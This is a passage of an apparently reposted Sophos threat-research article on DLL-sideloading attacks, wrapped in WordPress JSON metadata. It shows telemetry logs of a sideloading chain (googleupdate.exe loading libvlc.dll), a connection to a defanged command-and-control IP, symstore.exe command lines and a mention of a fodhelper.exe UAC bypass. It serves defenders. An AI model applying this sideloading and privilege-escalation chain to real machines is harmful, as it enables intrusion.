2022-06-24T04:10:14.322856Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:program fileswinrarrar.exe::40260 ]  \u00a0\u00a0\u00a0\u00a0 === FileWrite ===&gt;\u00a0\u00a0\u00a0 [ c:userspubliclibrariesoutgoogleupdate.exe ]  2022-06-24T04:10:14.322856Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:program fileswinrarrar.exe::40260 ]  \u00a0\u00a0\u00a0\u00a0 === FileRead ===&gt;\u00a0\u00a0\u00a0 [ c:userspubliclibrariesoutc.rar ]<\/pre>\n<p>Execution of the third sideloading scenario:<\/p>\n<pre>2022-06-24T04:11:16.921480Z\u00a0\u00a0\u00a0\u00a0\u00a0 [   c:userspubliclibrariesoutgoogleupdate.exe::41944 ]\u00a0\u00a0 === FileRead ===&gt;  \u00a0\u00a0\u00a0\u00a0 [ c:userspubliclibrariesoutlibvlc.dll ]  2022-06-24T04:11:16.962673Z\u00a0\u00a0\u00a0\u00a0\u00a0 [   c:userspubliclibrariesoutgoogleupdate.exe::41944 ]\u00a0\u00a0 === FileRead ===&gt;  \u00a0\u00a0\u00a0\u00a0 [ c:userspubliclibrariesoutloader.ja ]<\/pre>\n<p>Connecting to the server:<\/p>\n<pre>2022-06-24T04:18:11.335261Z\u00a0\u00a0\u00a0\u00a0\u00a0 [   c:userspubliclibrariesciscocollabhost.exe::38752 ]\u00a0\u00a0\u00a0 === IpConnector ===&gt;  \u00a0 \u00a0 \u00a0[ 91.245.253[.]52 ]<\/pre>\n<p>The threat actor executed symstore.exe, with a few different command line arguments:<\/p>\n<pre>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u00a0\"commandLine\" :   \"C:\\Users\\Public\\Libraries\\out\\symstore.exe\u00a0   C:\\Users\\Public\\Libraries\\out\\googleupdate.exe\",  \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \"commandLine\" :   \"C:\\Users\\Public\\Libraries\\out\\symstore.exe\u00a0   C:\\users\\public\\libraries\\3.exe\",  \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \"commandLine\" :   \"C:\\Users\\Public\\Libraries\\out\\symstore.exe\u00a0 \"mkdir   C:\\programdata\\googleupdate\"\",<\/pre>\n<p>It is likely that the sideloaded DLL component (symsrv.dll) takes these command-line parameters and executes using the fodhelper.exe UAC bypass trick.<\/p>\n<p>IOCs for these attacks will be available on our <a 
href=\"https:\/\/github.com\/sophoslabs\/IoCs\">GitHub repository<\/a>.<\/p>\n<\/p><\/div>\n<p><a href=\"https:\/\/news.sophos.com\/en-us\/2022\/11\/03\/family-tree-related-dll-sideloading-cases-bear-strange-fruit\/\" target=\"bwo\" >http:\/\/feeds.feedburner.com\/sophos\/dgdY<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/shutterstock_188747756.jpg\"\/><\/p>\n<p><strong>Credit to Author: Gabor Szappanos| Date: Thu, 03 Nov 2022 12:03:13 +0000<\/strong><\/p>\n<p>A threat actor\u2019s repeated use of DLL-hijack execution flow makes for interesting attack results, including omnivorous file ingestion; we break down five cases and find commonalities<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10378,10377],"tags":[27897,129,27030,16771,27033],"class_list":["post-20534","post","type-post","status-publish","format-standard","hentry","category-security","category-sophos","tag-dll-side-load","tag-featured","tag-sophos-x-ops","tag-threat-research","tag-x-ops"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/20534","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=20534"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/20534\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.ph
p\/wp-json\/wp\/v2\/media?parent=20534"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=20534"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=20534"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}